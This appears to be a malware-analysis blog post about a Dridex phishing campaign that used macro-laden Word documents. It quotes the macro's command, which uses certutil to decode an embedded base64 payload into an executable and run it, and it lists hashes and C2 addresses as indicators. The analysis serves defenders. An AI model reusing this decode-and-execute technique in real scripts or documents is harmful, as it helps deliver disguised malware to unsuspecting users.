I have seen more than 40k emails sent during a window frame of 36 hour and I have identified around 300 different samples. The samples size are between 260KB and 360KB and all of them are MS Word office documents.
Last week I wrote here about the last Locky campaign and the techniques used by the cyber criminals to fool the victims. Dridex and Locky Threat Actors are very close friends ;-)
and they are sharing some of the TTP they are using in their campaigns ;-)
Currently, In both cases, they have been sending a blank MS word office document which requieres to enable macros
In the Dridex campaign there are some particular interesting points.
Debugging the VBA code of the the Macro, which it is password protected, the first interesting thing I see is that the Windows command 'certutil' is used. This command handles digital certificates in windows.
The command is:
"cmd /c certutil -decode %TMP%\\harakiri.pfx %TMP%\\harakiri.exe & start %TMP%\\harakiri.exe"
Usually PFX files are PKCS#12 containers which stores certificates. What's going on?
in this case, the command is not related to digital certificates at all, but it is just converting some base64 strings stored in a file name "harakiri.pfx" and dumping into an executable file name "harakiri.exe". After that, the file harakiri.exe is executed.
The harakiri.pfx is inside the MS Word file. Looking into the malicious file I see a bunch of base64 starting in offset DC80
and ending in offset 56104
Now, dumping that set of data (from offset DC80 up to offset 56104) and decoding with base64, the same way that the command 'certutil' does, I obtain a PE file. This is the file which later is executed when running the macro
The file obtained is already reported in VT https://www.virustotal.com/en/file/08c9b30c7f01dbbc41fb0f11768a15cfe0d68a524acd338eb880e1704575370b/analysis/
This time the VBA inside the MS office document is not dropping anything from Internet, but just extracting and converting the PE file inside itself.
Some IOCs
9230dde2cfb1fcb641f3a25171ffadb2
3141fcce028913f34484f1d90a1bfbc7
5a93499e100e0cfd987c331c9dc1930a
60322d81c8d22c7e71efd471c8b6c8c5
76148125eeb97f9284262cb6e1915641
645598660fe6e184bc1d59816796f54d
918aa9994bac90cc28ad51fae7e35128
594c13bd90f9ce0025da1cc31c02002a
2798b6f9723d4a78800be3d9bd2bb00a
b2e4df0f3139b4039447b209326b758c
80.88.89.222:11443
213.192.1.171:40443
50.56.118.137:4033
84.40.2.227:11443
162.251.84.219:4343
24.199.222.250:4343
160.16.69.29:11443
188.120.253.193:40443
80.88.89.222:11443
213.192.1.171:40443
50.56.118.137:4033
84.40.2.227:11443
162.251.84.219:4343
24.199.222.250:4343
160.16.69.29:11443
188.120.253.193:40443